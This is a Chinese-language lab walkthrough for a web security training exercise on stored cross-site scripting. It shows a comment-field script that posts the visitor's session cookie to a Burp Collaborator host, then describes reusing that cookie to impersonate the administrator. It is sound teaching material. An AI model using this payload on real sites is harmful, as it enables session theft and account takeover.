Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie
靶场内容
本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。
注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。
一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。
解决方法
- XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
- 这个靶场还是很细的:
- 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
- fetch里面的URL内容是Burp Collaborator Client出来的payload
- 之后打开Burp Collaborator Client,可以发现有个HTTP报文
- 点开它,里面是管理员的session
- 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了
Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie相关推荐
- XSSF - Cross Site Scripting Framework
2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...
- Cross Site Scripting DOM攻击jQuery append() 的处理方法
做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...
- 【常见Web应用安全问题】---1、Cross Site Scripting
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些. 常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...
- XSS(Cross Site Scripting)攻击简介
环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...
- Reflected Cross Site Scripting (XSS)
前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS), 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...
- Xss-reflected/stored跨站脚本分析(Cross site scripting)
Xss-reflected/stored跨站脚本分析(Cross site scripting) 基础知识 针对Dom - dochtml Url概念:协议+网址/dns+端口+路径 XSS原理:对U ...
- DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...
- 靶场练习Exploiting cross-site scripting to steal cookies
复制Burp Collaborator客户端中的地址 到网页的靶场把框中地址替换 将'修改过的的代码提交到网页,Burp Collaborator客户端中会出现HTTP请求,请求内容,还有盗取到的co ...
- CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击
CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...
最新文章
- mysql select time,MySql查询时间段的方法
- 原型、原型对象、构造函数、原型链理解
- [C] 跨平台使用Intrinsic函数范例1——使用SSE、AVX指令集 处理 单精度浮点数组求和(支持vc、gcc,兼容Windows、Linux、Mac)...
- 【下一代核心技术DevOps】:(三)私有代码库阿里云Git使用
- 【转】C#实现SM3国密加密
- HTML5触摸事件演化tap事件
- SAP License:修改物料账期
- frobenius范数_非负矩阵之Perron-Frobenius定理
- vscode+leetcode环境配置
- docker容器资源配额控制
- python从入门到放弃-《Python3从入门到放弃》视频教程
- Servlet教程第5讲笔记
- 名编辑电子杂志大师教程 | 菜单设置
- HTML跳转页面指定位置的几种方法
- 华为查看mpls的命令_华为BGP基本命令
- 最简单的STM32入门教程----闪烁LED
- WebRTC的拥塞控制和带宽策略
- 记账本软件的用例描述
- 通信技术计算机技术合称为,通信技术、计算机技术和控制 技术合称为3C
- AMIGO小清新资讯(GBK+UTF)DZ仿flyme模板